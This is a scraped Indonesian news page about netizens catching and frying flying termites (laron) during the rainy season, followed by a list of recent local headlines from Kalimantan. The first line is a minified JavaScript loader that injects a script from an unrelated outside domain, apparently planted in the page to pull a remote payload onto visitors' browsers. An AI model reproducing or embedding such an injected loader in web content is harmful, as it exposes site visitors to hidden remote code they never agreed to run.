(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Lifestyle

Musim Hujan Tiba, Warganet Ini Berburu Laron untuk Dijadikan Makanan


KANALKALIMANTAN.COM – Saat musim hujan tiba, sejumlah daerah juga jadi kerap kedatangan ‘tamu’. Serang yang disebut laron secara ramai akan datang untuk berkeliling di lampu rumah.

Hal ini kerap membuat penghuni resah karena sayap laron yang rontok bisa mengotori rumah. Namun, siapa sangka ada orang yang memanfaatkan laron untuk dijadikan makanan.

Seorang warganet memamerkan makanan yang ia buat dari laron melalui akun Instagram @FOOD_FESS. Warganet tersebut rupanya memburu laron untuk digoreng dengan tepung.

“Musim hujan telah tiba. Hasil karya berburu laron kemarin malam,” tulisnya dalam unggahan itu.

 

 

Baca juga: Jadi Korban Investasi Bodong, 9 Warga  Datangi DPRD Kotabaru

Dalam foto tersebut, tampak sekumpulan laron yang digoreng dengan tepung. Wujudnya pun masih sangat tampak bahwa itu adalah laron utuh meski tanpa sayap.

Hal ini cukup mengejutkan mengingat laron goreng tepung merupakan makanan yang tak banyak dikonsumsi orang. Apalagi biasanya laron dibiarkan begitu saja tanpa terpikirkan bisa dikonsumsi.

Tak heran unggahan ini membuat banyak warganet kaget, apalagi sejumlah orang ada yang merasa takut dengan kehadiran laron.

Cuitan itu kemudian menarik banyak perhatian warganet. Beragam komentar memenuhi unggahan terkait.

Baca juga: Kasus COVID-19 di China Naik Lagi, Gara-gara Varian Baru?

“Woy, demi apa sih bisa digoreng kayak gitu? Selama ini kalau udah pada mati gue sapu terus langsung buang,” komentar seorang warganet.

Warganet yang terkejut juga ikut berkomentar pada unggahan ini. “Woyilah yang bener aja masa gituan dimakan? Apa nggak geli?” tanyanya.

“Duh, nggak tega banget makan gituan. Berasa kayak makan apaan gitu,” tulis warganet lainnya di kolom komentar.

Namun ternyata ada pula warganet yang menyukai laron goreng seperti dalam unggahan tersebut.

Baca juga: Benarkah Jalan Tol di Indonesia Tidak Aman? Berikut Faktanya

“Suka banget, tapi aku nggak bisa makan karena alergi wkwk. Jujur enak banget. Rasanya kalau digoreng doang udah gurih, dibikin peyek rasanya kayak makan peyek teri. Kalau dibikin botok atau pepes rasanya lebih enak lagi. Bentuknya emang gak menyenangkan, tapi rasanya menurutku enak,” tulisnya menjelaskan rasa dari olahan laron di kolom balasan komentar.

Sementara itu, hingga Selasa (9/11/2021), cuitan tentang laron goreng tepung ini sudah disukai oleh ratusan pengguna Twitter. (Suara.com)

Editor: suara


Risa

Recent Posts

Permudah Kebutuhan Transaksi Jemaah Haji di Tanah Suci dengan BRImo

KANALKALIMANTAN.COM- Ibadah haji merupakan salah satu impian bagi umat Islam di seluruh dunia. Agar ibadah… Read More

9 menit ago

Bawaslu Banjarbaru Seleksi Panwascam Hanya di Empat Kecamatan

KANALKALIMANTAN.COM, BANJARBARU - Badan Pengawas Pemilihan Umum (Bawaslu) Kota Banjarbaru tengah merekrut Panitia Pengawas Kecamatan… Read More

29 menit ago

Pemko Banjarbaru Bentuk Tim Desk Pilkada 2024

KANALKALIMANTAN.COM, BANJARBARU - Pemerintah Kota (Pemko) Banjarbaru Provinsi Kalimantan Selatan (Kalsel) membentuk Tim Desk Pilkada… Read More

2 jam ago

Jelang Pilkada 2024, KPU HSU Melantik 50 Anggota PPK

KANALKALIMANTAN.COM, AMUNTAI - Komisi Pemilihan Umum (KPU) Kabupaten Hulu Sungai Utara (HSU) resmi melantik 50… Read More

3 jam ago

Pipa Bocor, Suplai Air Bersih di Banjarmasin Barat dan Tengah Terhenti

KANALKALIMANTAN.COM, BANJARMASIN - Pipa distribusi air bersih milik Perusahaan Air Minum (PAM) Bandarmasih di wilayah… Read More

5 jam ago

DED Pemasangan ATCS Tugu Adipura Masih Penyempurnaan Kajian

Kadishub Banjarbaru: Setelah Kajian Selesai, Berikutnya Perizinan BPJN dan BPTD Read More

5 jam ago

This website uses cookies.